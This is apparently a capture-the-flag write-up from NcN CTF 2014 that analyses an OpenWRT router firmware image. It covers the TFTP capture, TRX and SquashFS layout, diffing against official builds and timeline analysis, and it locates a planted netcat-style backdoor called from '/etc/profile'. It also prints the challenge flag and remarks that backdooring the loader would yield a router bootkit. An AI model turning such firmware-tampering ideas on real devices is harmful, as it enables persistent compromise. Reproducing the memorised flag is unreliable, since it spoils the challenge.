Download provided: <a href="https://github.com/MarioVilas/write-ups/blob/master/ncn-ctf-2014/Vodka/vodka">https://github.com/MarioVilas/write-ups/blob/master/ncn-ctf-2014/Vodka/vodka</a><br />
<br />
<br />
<b>Network Forensics</b><br />
<br />
The download provided is a packet capture using the PCAP-NG format. Wireshark is too mainstream, so let's <a href="http://pcapng.com/">convert the PCAP-NG to PCAP</a> and open it using <a href="http://www.netresec.com/?page=Networkminer">Network Miner</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTH_rowCasj5POm7DmkZv_QvqocPo9f6lINR__90dm5KSiGhRGwQZZddnFoazeCLc6LJcjw0GPBP4EFTBn0zNo3uISHAI7hAHiXEW-h3hNMQpkSH2JjKNDOV8k7jj43K3PsjxgnkxeX_fm/s1600/tftp1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTH_rowCasj5POm7DmkZv_QvqocPo9f6lINR__90dm5KSiGhRGwQZZddnFoazeCLc6LJcjw0GPBP4EFTBn0zNo3uISHAI7hAHiXEW-h3hNMQpkSH2JjKNDOV8k7jj43K3PsjxgnkxeX_fm/s320/tftp1.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXP6LXytU1035AkBWz4OQiWBZhog3hLJ2dBsr19ArfkDb2Luu1kAB8n6rM8WaL4XDdvAJofENJ0PISGRb1zbPmEIemTGXUpSg1HpU4t9Wnw8oDoNrw56jJs6VlBt-kLnXCxWhrOVq6gaEe/s1600/tftp2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXP6LXytU1035AkBWz4OQiWBZhog3hLJ2dBsr19ArfkDb2Luu1kAB8n6rM8WaL4XDdvAJofENJ0PISGRb1zbPmEIemTGXUpSg1HpU4t9Wnw8oDoNrw56jJs6VlBt-kLnXCxWhrOVq6gaEe/s640/tftp2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Network Miner makes it very easy for us to understand what's going on: there's some sort of file transfer via TFTP and the filename seems to be related to an OpenWRT firmware image.<br />
<b><br /></b>
<b><br /></b>
<b>Firmware structure</b><br />
<br />
We always <a href="https://twitter.com/bernardomr/status/530532003498971136">binwalk all the things</a> but very few people stop to analyze and understand the firmware structure properly. We know that the firmware image was downloaded using TFTP, a common way used by many routers to transfer config files/updates and it is probably based on the <a href="https://www.openwrt.org/">OpenWRT project</a>.<br />
<br />
So what does binwalk tell us?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEC6PUPTNNUKbT_9zu8UsKqG47hyOzlUrxa_eNx7A-n6PbNQdc_27av58-JjXeSnWDK7DRNMiygqMfTP80zaGdTFPwJ5z3WFbThZ6vRqvBMikWMGZWXmp66UKGByVpCzR4erOSpSwBJ6R5/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEC6PUPTNNUKbT_9zu8UsKqG47hyOzlUrxa_eNx7A-n6PbNQdc_27av58-JjXeSnWDK7DRNMiygqMfTP80zaGdTFPwJ5z3WFbThZ6vRqvBMikWMGZWXmp66UKGByVpCzR4erOSpSwBJ6R5/s1600/Screenshot-Terminal.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEiQG2pTJZBeQbdwqBRa_Gdv9U5E9VlFWq-8ujHpALfA938WCO8-nTsoXYj6HY9PduNQpzf6gDD2_sxShKE_HhME8z9YVHMZ1o3jA_kvS51ayxAIqq-77HItvLtFxR0j46wybi55cKORgk/s1600/firm.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEiQG2pTJZBeQbdwqBRa_Gdv9U5E9VlFWq-8ujHpALfA938WCO8-nTsoXYj6HY9PduNQpzf6gDD2_sxShKE_HhME8z9YVHMZ1o3jA_kvS51ayxAIqq-77HItvLtFxR0j46wybi55cKORgk/s1600/firm.PNG" width="640" /></a></div>
<br />
The <a href="http://wiki.openwrt.org/doc/techref/bootloader/cfe">Commom Firmware Environment</a> (CFE) is a firmware interface/bootloader present on Broadcom SOCs. It is analogous to the BIOS on PC platforms and it is responsible for CPU initialization and bootstrap code on embedded processors. The CFE is also referred as PMON and it is generally mapped to <a href="https://en.wikipedia.org/wiki/Memory_Technology_Device">mtd0</a>.<br />
<br />
The JFFS2/NVRAM filesystem is the non-volatile partition. They store all the configuration parameters, including router settings, passwords and logs.<br />
<br />
Bear in mind firmware updates generally do not include the CFE/NVRAM partition. You can access the CFE console using serial and you can also dump them on a live system using DD or via <a href="http://goodfet.sourceforge.net/apps/spi/">SPI</a>. Let's focus on the firmware sections included on the provided image (openwrt-wrtsl54gs-squasfs.bin):<br />
<b><br /></b>
<b>TRX (Offset 0x20)</b><br />
<br />
The TRX header is just an encapsulation, describing a series of information from the firmware, including the image size, CRC, flags, version information and partition offsets. Binwalk wasn't recognizing the header and the relative offsets properly so I submitted <a href="https://github.com/devttys0/binwalk/pull/106">these</a> <a href="https://github.com/devttys0/binwalk/pull/107">two</a> pull requests. Creating <a href="https://github.com/devttys0/binwalk/wiki/Creating-Custom-Signatures">custom signatures</a> for binwalk is pretty straightforward.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQv38k6SfsXTPwNh7v3jEzCaPHvL8iN2obySLo9DIKOTGdL-51sMC5wk4fheoUVT6JTF7kQgn2b_ccLNmhadJ0riv78HOjl-F2co-zV9n9HBFtxrwpWERHF5xnB2Il0PIInEbUlxf_Pr6n/s1600/Screenshot-Terminal-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQv38k6SfsXTPwNh7v3jEzCaPHvL8iN2obySLo9DIKOTGdL-51sMC5wk4fheoUVT6JTF7kQgn2b_ccLNmhadJ0riv78HOjl-F2co-zV9n9HBFtxrwpWERHF5xnB2Il0PIInEbUlxf_Pr6n/s1600/Screenshot-Terminal-00.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Some firmwares (like the newer ones from ASUS and Netgear) use this TRX structure but don't include a loader: the Linux Kernel and the RootFS may be shifted on this occasion.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho7oJ3iG5DS5u0YABisqrhK1pkycuXA8AQO5KC4lodaOtdNBd0tWi4jcz-07jOZVLf9OeMpdEeDIYUyw7E_Wmf3S2K9geT3WE_UvMBSnCVWM0q4E824jUhdAV_ACKFB-n4YYHgaVKXugGn/s1600/trx-loader.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho7oJ3iG5DS5u0YABisqrhK1pkycuXA8AQO5KC4lodaOtdNBd0tWi4jcz-07jOZVLf9OeMpdEeDIYUyw7E_Wmf3S2K9geT3WE_UvMBSnCVWM0q4E824jUhdAV_ACKFB-n4YYHgaVKXugGn/s1600/trx-loader.png" width="400" /></a></div>
<br />
If the firmware includes any extra header before the TRX, you have to sum their size with the displayed partition offsets in order to find the real values. Some firmwares for SOHO modems out there won't include it, so these values should be right on most cases. The downloaded OpenWRT image had the following offsets:<br />
<br />
<ul>
<li>Loader: 0x20 + 0x1C = 0x3C</li>
<li>Kernel: 0x20 + 0x8D8 = 0x8F8</li>
<li>RootFS: 0x20 + 0x7E400 = 0x7E420</li>
</ul>
<br />
In this specific case, we have a <a href="http://wiki.openwrt.org/doc/techref/header">BinHeader</a> right before the TRX, indicating the board ID, the FW Date and the Hardware Date. The struct is described on <a href="https://github.com/mirror/dd-wrt/blob/master/src/include.v24/cyutils.h">cyutils.h</a>:<br />
<br />
<script src="https://gist.github.com/bmaia/3feab2fe6234a1e59deb.js"></script>
This extra header appears on a few routers like the WRT54G series: the Web GUI checks for this pattern before actually writing the firmware.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTdgLcFPozvGmcfmCyfR4LYbFq0dwL89n71gKH1bGNZFtIwxDlYK2YY9dw5Rmo2KNMyYt_SNoi_XJj2sqxx5lkpHrsgw7sI7Z9Yx93zDFHfcRCmWRAHd1qdMm7xmN99593Yzq0PINrA1ND/s1600/hex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTdgLcFPozvGmcfmCyfR4LYbFq0dwL89n71gKH1bGNZFtIwxDlYK2YY9dw5Rmo2KNMyYt_SNoi_XJj2sqxx5lkpHrsgw7sI7Z9Yx93zDFHfcRCmWRAHd1qdMm7xmN99593Yzq0PINrA1ND/s1600/hex.PNG" width="640" /></a><br />
<br />
We are particularly interested on the fwdate field (Firmware Date), composed by the hex values 07 02 03. According to <a href="https://dev.openwrt.org/browser/trunk/tools/firmware-utils/src/addpattern.c">addpattern.c</a>, the first byte defines the year, the second one is the month and the third byte refers to the day the firmware was created. The fwdate seems to be 03-February-2007, save that for later, we will need that =)<br />
<br />
<b>GZ'd LZMA Loader (Offset 0x3C)</b><br />
<br />
According to <a href="http://wiki.openwrt.org/doc/techref/flash.layout">OpenWRT Wiki</a>, the boot loader has no concept of filesystems: it assumes that the start of the TRX data section is executable code.<br />
<br />
The boot loader boots into an LZMA program which decompresses the kernel into RAM and executes it. It turns out the boot loader does know gzip compression, so we have a gzip-compressed LZMA decompression program at 0x3C.<br />
<br />
You can find the source code for this <a href="https://dev.openwrt.org/browser/trunk/target/linux/brcm-2.4/image/lzma-loader/src?rev=11275">lzma-loader here</a> and <a href="https://downloads.openwrt.org/sources/loader-0.04.tar.gz">here</a>. Note the <a href="https://dev.openwrt.org/browser/trunk/target/linux/brcm-2.4/image/lzma-loader/src/Makefile?rev=11275">TEXT_START offset</a> at 0x80001000: we may need to adjust the Loading Address on our Disassembler in order to reverse the compiled loader. Don't forget to decompress it (gunzip) before reversing the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix07sEQIiFzR70zx55_Pn0msP6LWvN3h0XMG19Tq4eQ28qxH6L4YUFUi88VLLjADrykdYJ1E2eSr4GzdmW-Y4_3h7RVhQQ4ADTMIrutItRFYzZdwhHJpKM8SG5dwFY5eQoiuEnfU71rgid/s1600/offset.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix07sEQIiFzR70zx55_Pn0msP6LWvN3h0XMG19Tq4eQ28qxH6L4YUFUi88VLLjADrykdYJ1E2eSr4GzdmW-Y4_3h7RVhQQ4ADTMIrutItRFYzZdwhHJpKM8SG5dwFY5eQoiuEnfU71rgid/s1600/offset.PNG" width="155" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF0V_M-RdeZ6cN0S9bWqR_3p8z7rNSr3GRHP9qZzB6n-JeA49Ub-qykEN2RxPkyRwBFw1q3cNzQv2IxW1dRZnPHiRrFp4El0KMwQmaNg8S6rKSbKWs7MLUaooRjckacJIL8sA1c_1ihcic/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF0V_M-RdeZ6cN0S9bWqR_3p8z7rNSr3GRHP9qZzB6n-JeA49Ub-qykEN2RxPkyRwBFw1q3cNzQv2IxW1dRZnPHiRrFp4El0KMwQmaNg8S6rKSbKWs7MLUaooRjckacJIL8sA1c_1ihcic/s1600/1.PNG" width="400" /></a></div>
<br />
Most embedded toolchains would strip the binaries in order to reduce the firmware size. If you want to reverse a friendlier version of the loader, grab the latest <a href="https://downloads.openwrt.org/barrier_breaker/14.07/brcm47xx/generic/OpenWrt-ImageBuilder-brcm47xx_generic-for-linux-x86_64.tar.bz2">OpenWRT ImageBuilder</a> and search for loader.elf:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiISyBlqiB_IbmyxsGvl1nxCVga1DcEND95dj3mDyGYt65w3yXMnggLcqr-CuZdiiKzCkdZ_W8hjuLMBAABDoFRms7zjS5zpDDmZWmqsK_MqAldjcPw9gWFqYj6Gqx5bV2wv-oGSteDP1B/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiISyBlqiB_IbmyxsGvl1nxCVga1DcEND95dj3mDyGYt65w3yXMnggLcqr-CuZdiiKzCkdZ_W8hjuLMBAABDoFRms7zjS5zpDDmZWmqsK_MqAldjcPw9gWFqYj6Gqx5bV2wv-oGSteDP1B/s1600/Screenshot-Terminal-4.png" width="400" /></a></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkUlTDRvaD3LwEsbsAyqaQF4b34nnJYL5WHaluHpJ1hWU1YjYdkvZSkvr31r4HMHu02jixlzbFmLF8Rsmj78bYx_L_0tSPwz4COR-gfWZ_cgJBBDJ0YbaVzy-ytAdSgRUGapbj6qy8Sts/s1600/2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkUlTDRvaD3LwEsbsAyqaQF4b34nnJYL5WHaluHpJ1hWU1YjYdkvZSkvr31r4HMHu02jixlzbFmLF8Rsmj78bYx_L_0tSPwz4COR-gfWZ_cgJBBDJ0YbaVzy-ytAdSgRUGapbj6qy8Sts/s1600/2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Woohoo, blue code =)</td></tr>
</tbody></table>
<br />
Note that if we modify the loader to include a backdoor, we would have our very own Router <a href="https://en.wikipedia.org/wiki/Rootkit#Bootkits">Bootkit</a>, cool isn't it?<br />
<br />
<b>LZMA'd Kernel (Offset 0x8F8)</b><br />
<br />
Instead of just putting a kernel directly onto flash, most embedded devices compress the kernel using LZMA. The boot loader boots into an LZMA program which decompresses the kernel into RAM and executes it.<br />
<br />
Binwalk has a <a href="https://github.com/devttys0/binwalk/blob/5404839534c9ea6000f85d13664d84a19418fa11/src/binwalk/magic/linux">signature</a> to find Kernel strings in raw Linux Kernels. The identified string lists the toolchain used to compile the Kernel, as well as the compiled date and version information:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBYZl6kdrFyrONTwKRp-qbxLK5b8cGzljaSezZkD1wHl64S_pwvvnFIMCOgweRQt4w8PDNH_0PkyPKTVcNUoxeikDlbJEOL3XBaVYzenIf1J-LPPM04fnmp9DyIrW-r9OpWIWD3KKq5UrO/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBYZl6kdrFyrONTwKRp-qbxLK5b8cGzljaSezZkD1wHl64S_pwvvnFIMCOgweRQt4w8PDNH_0PkyPKTVcNUoxeikDlbJEOL3XBaVYzenIf1J-LPPM04fnmp9DyIrW-r9OpWIWD3KKq5UrO/s1600/Screenshot-Terminal-5.png" width="400" /></a></div>
<br />
And why did binwalk manage to find all these information from the Kernel? The answer can be found on the <a href="https://dev.openwrt.org/browser/branches/whiterussian/openwrt/toolchain/gcc/Makefile#L82">toolchain's Makefile</a>:<br />
<br />
<script src="https://gist.github.com/bmaia/154fb3df62ebd1947a9b.js"></script>
If we follow the steps from my <a href="http://w00tsec.blogspot.com.br/2014/02/analyzing-malware-for-embedded-devices.html">previous post</a> we can build a customized Kernel for OpenWRT. The generated <a href="https://en.wikipedia.org/wiki/Vmlinux">vmlinux</a> is generally an ELF file, but in our case, the object was <a href="https://dev.openwrt.org/browser/branches/whiterussian/openwrt/target/linux/linux-2.4/Makefile#L349">stripped using objcopy</a>:<br />
<br />
<script src="https://gist.github.com/bmaia/3dd9d0579bf9b967e3a8.js"></script>
Did you notice the compile date was 03-February-2007? Let's save that for later as well.<br />
<br />
<b>SquashFS (Offset 0x72420)</b><br />
<br />
The last part is the actual filesystem. Most embedded Linux devices use SquashFS and many vendors hack it in order to get better compression and faster performance. Hopefully we don't have to worry about that as <a href="http://www.devttys0.com/2014/08/mucking-about-with-squashfs/">Sasquatch</a> handles different SquashFS header/compression formats.<br />
<br />
The filesystem has the standard OpenWRT directories and files, including a banner from the 0.9 build (White Russian).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMyWQ31DXT1cGlolYuzbfrWe7P7-BDDWtcyPc-blKajltp8uPM4XwYSJw3Ycul8Z83umCwbfsblq4gnGhyphenhypheneEACwdiwcSas5hT0cXHnEzjCJblzrbO42waoWa8UAVj85KZc9j1mx9nuFsYn/s1600/Screenshot-Terminal-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMyWQ31DXT1cGlolYuzbfrWe7P7-BDDWtcyPc-blKajltp8uPM4XwYSJw3Ycul8Z83umCwbfsblq4gnGhyphenhypheneEACwdiwcSas5hT0cXHnEzjCJblzrbO42waoWa8UAVj85KZc9j1mx9nuFsYn/s1600/Screenshot-Terminal-7.png" width="400" /></a></div>
<br />
Both binwalk and sasquatch display the SquashFS superblock information, including the creation/last append time:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIxpwcCyaHoAKcV222zUibMkJEe1T808991a5mFQBW_gAuP1ySlD5Jv3h63Ad2sXUFWRRZBDSyjwIF8IJ8zDsX4ndjtou1e5qQg3z21x61bAzV2waS9hA-3n0xs2YZlcsArDbdsHu2clYy/s1600/Screenshot-Terminal-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIxpwcCyaHoAKcV222zUibMkJEe1T808991a5mFQBW_gAuP1ySlD5Jv3h63Ad2sXUFWRRZBDSyjwIF8IJ8zDsX4ndjtou1e5qQg3z21x61bAzV2waS9hA-3n0xs2YZlcsArDbdsHu2clYy/s1600/Screenshot-Terminal-6.png" width="400" /></a></div>
<br />
Did you spot the date 29-October-2014? There's definitely something going on here =)<br />
<br />
<b style="text-align: center;"><br /></b>
<b style="text-align: center;">Directory Tree Diff & Fuzzy Hashing</b><br />
<br />
Now that we have unpacked & unsquashed the firmware, let's use <a href="https://github.com/bmaia/binwally">binwally</a> to compare the directory tree and find the needle in the haystack.<br />
<br />
After googling the filename (openwrt-wrtsl54gs-squashfs.bin), we get three possible candidates:<br />
<br />
- <a href="https://downloads.openwrt.org/whiterussian/0.9/default/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/default/openwrt-wrtsl54gs-squashfs.bin</a><br />
- <a href="https://downloads.openwrt.org/whiterussian/0.9/micro/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/micro/openwrt-wrtsl54gs-squashfs.bin</a><br />
- <a href="https://downloads.openwrt.org/whiterussian/0.9/pptp/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/pptp/openwrt-wrtsl54gs-squashfs.bin</a><br />
<br />
OpenWRT offers different builds for the same device because of constraints like limited flash size. Let's download these three candidates, unpack and compare them:<br />
<br />
<div class="code">
binwally.py ctf/_openwrt-wrtsl54gs-squashfs.bin.extracted/ micro/_openwrt-wrtsl54gs-squashfs.bin.extracted/</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1kZP32c2OWTTQCRvCZhj6IHkrd6rzpzEf3XTVdOcYoAcaOkbygufFMS9viS3ptb066LDsUGb0ZBAGCThg5RaYy8-ZGPCz68kfryc4F0Pi_qrHApzFH2I8PO5hAOV4tqjRzdZbSuAQQWuV/s1600/binwally.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1kZP32c2OWTTQCRvCZhj6IHkrd6rzpzEf3XTVdOcYoAcaOkbygufFMS9viS3ptb066LDsUGb0ZBAGCThg5RaYy8-ZGPCz68kfryc4F0Pi_qrHApzFH2I8PO5hAOV4tqjRzdZbSuAQQWuV/s1600/binwally.png" width="400" /></a></div>
<br />
The "micro" build has the highest overall match score (99%), let's spot the differences:<br />
<br />
<div class="code">
binwally.py ctf/_openwrt-wrtsl54gs-squashfs.bin.extracted/ micro/_openwrt-wrtsl54gs-squashfs.bin.extracted/ | grep -E -v "ignored|matches"</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_YcFKeXUDBZkPSDp8qhkbmXgf-D7HnlFF9cZpSHLEmHaDEzjw65rssZOINU2Kq9j8Rrxq2QDwD_fnmB5eQ4xqNYxUGaJjfLzFsAXCcv2lDg3sN1Bip3-0jDCKfz7L8Nf2-WJRhDWwulA8/s1600/binwally2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_YcFKeXUDBZkPSDp8qhkbmXgf-D7HnlFF9cZpSHLEmHaDEzjw65rssZOINU2Kq9j8Rrxq2QDwD_fnmB5eQ4xqNYxUGaJjfLzFsAXCcv2lDg3sN1Bip3-0jDCKfz7L8Nf2-WJRhDWwulA8/s1600/binwally2.png" width="400" /></a></div>
<br />
After carefully reviewing these files, we notice that the "/etc/profile" was modified to include a call to the nc backdoor.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCipxQ9NmfTAuPLmaefxl1rKcd78rg7qY2jZPeP3zGsytZk4-Rs7tGgXj4ZosSwCOej71-rTCrVZD95QUZQaiPDq1DStSc8XwB41F61ds10CWOLmIDN466ZcA_M4uH_ypoWaD8vA1xnWfB/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCipxQ9NmfTAuPLmaefxl1rKcd78rg7qY2jZPeP3zGsytZk4-Rs7tGgXj4ZosSwCOej71-rTCrVZD95QUZQaiPDq1DStSc8XwB41F61ds10CWOLmIDN466ZcA_M4uH_ypoWaD8vA1xnWfB/s1600/diff.png" width="400" /></a></div>
<br />
The LZMA'd Kernel (offset 0x8F8) is the same on both images, even though binwally reports a difference. This happens because binwalk extraction doesn't know when to stop and both files also contain additional data like the SquashFS partition.<br />
<br />
The backdoor located at "/bin/nc" is a simple bash script that checks the MD5 from "/etc/profile" and draws a Nyan Cat along with the challenge key. In order to get the proper key, we simply modify the file location to the relative path "./etc/banner", to avoid overlapping with the file from the original system.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecj7RzwWsJcZcx0EmUT7uNfViQCuSRPsMtH9TQAVyMb3evyyPj5m0eWKEazPWUmmi2tdeRwFFx07PM10XNHNg84RdCX_fHBFjNJRtEWErJjShWMOuTTxRXLgIlQewqfEQazA6mvvLo2PV/s1600/backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecj7RzwWsJcZcx0EmUT7uNfViQCuSRPsMtH9TQAVyMb3evyyPj5m0eWKEazPWUmmi2tdeRwFFx07PM10XNHNg84RdCX_fHBFjNJRtEWErJjShWMOuTTxRXLgIlQewqfEQazA6mvvLo2PV/s1600/backdoor.png" width="400" /></a></div>
<br />
After running the file, we get the key NCNdeadb6adec4c77a40c23e04770924d3c5b18face.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggnsmUGR6ztdDyqRm5cy7rB0WeEBEUwAlHIIvsx7i-ZHXi_s_DoiFFjzO7dQM9qjlEI9CmeDcG6lrlFEISv3uOouzCxbGuMug7xOm2c52-p6OhLUUaDjY0TTSpjd2PXW1p7JfYTeJpp1ta/s1600/flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggnsmUGR6ztdDyqRm5cy7rB0WeEBEUwAlHIIvsx7i-ZHXi_s_DoiFFjzO7dQM9qjlEI9CmeDcG6lrlFEISv3uOouzCxbGuMug7xOm2c52-p6OhLUUaDjY0TTSpjd2PXW1p7JfYTeJpp1ta/s1600/flag.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
This was just too easy right? But what if we didn't have a known template for comparison?<br />
<br />
<b><br /></b>
<b>Timeline Analysis</b><br />
<b><br /></b>
My tool of choice to perform timeline analysis is <a href="http://plaso.kiddaland.net/">Plaso</a>, created by <a href="https://twitter.com/el_killerdwarf">@el_killerdwarf</a>. The tool is python-based, modular and very fast. What I like most about it is the ease to output results to <a href="http://www.elasticsearch.org/overview/elkdownloads/">ELK</a>. If you don't know about Plaso and the ELK stack, read this <a href="http://blog.kiddaland.net/2013/11/visualize-output.html">quick tutorial</a> and <a href="http://plaso.kiddaland.net/developer/building-the-tool/linux">set up your environment</a>.<br />
<br />
Let's use <a href="http://plaso.kiddaland.net/usage/log2timeline">log2timeline</a> to create a dump file, pointing to the extracted SquashFS path:<br />
<br />
<div class="code">
log2timeline.py output.dump squashfs-root/</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRdNImiy8qb-2S1BlI7pLoJQd3wgD_Ao8kX5wfT6Q4IkGRB0Xayd5kH4R3X7VKPc2I3tHY-TnFQAl8ANrLCrmvtRlcpvOwQw1ZRCiWyfvKzupBH1UAupeX6AO9mNlApKqsYHUT1fBbpH8e/s1600/Screenshot-Terminal-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRdNImiy8qb-2S1BlI7pLoJQd3wgD_Ao8kX5wfT6Q4IkGRB0Xayd5kH4R3X7VKPc2I3tHY-TnFQAl8ANrLCrmvtRlcpvOwQw1ZRCiWyfvKzupBH1UAupeX6AO9mNlApKqsYHUT1fBbpH8e/s1600/Screenshot-Terminal-8.png" width="400" /></a></div>
<br />
Let's fire up psort and include data in the timeline:<br />
<br />
<div class="code">
psort.py -o elastic output.dump</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBPg4vQAiXUftP_X6isltYct6JPwn97rWofnvi1c0qK7IDyRQrZpb3JuHFYdpTupIo82LUjxF_dSXuMBIRQur7QHRRW7OuXbTkwMd6ZFl3Uoirwak4nal_q1K5EcTM5mhkv9mntQC5CnZ7/s1600/Screenshot-Terminal-9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBPg4vQAiXUftP_X6isltYct6JPwn97rWofnvi1c0qK7IDyRQrZpb3JuHFYdpTupIo82LUjxF_dSXuMBIRQur7QHRRW7OuXbTkwMd6ZFl3Uoirwak4nal_q1K5EcTM5mhkv9mntQC5CnZ7/s1600/Screenshot-Terminal-9.png" width="400" /></a></div>
<br />
That's all, Plaso uses the <a href="https://github.com/log2timeline/plaso/blob/master/plaso/parsers/filestat.py">filestat</a> parser to extract metadata from the files, outputting results to Elasticsearch.<br />
<br />
We already identified the following dates from the firmware:<br />
<br />
<ul>
<li>03 February 2007 (??:??:??): BinHeader firmware creation date</li>
<li>03 February 2007 (13:16:08): Linux Kernel compile date</li>
<li>29 October 2014 (16:53:25): SquashFS creation or last append time</li>
</ul>
<br />
First let's filter the filesystem attributes: we just want to display the mtime (modified) timestamp, so we are going to perform a micro analysis to include the value. The filter should be something like this: field must | field timestamp_desc | query: "mtime".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
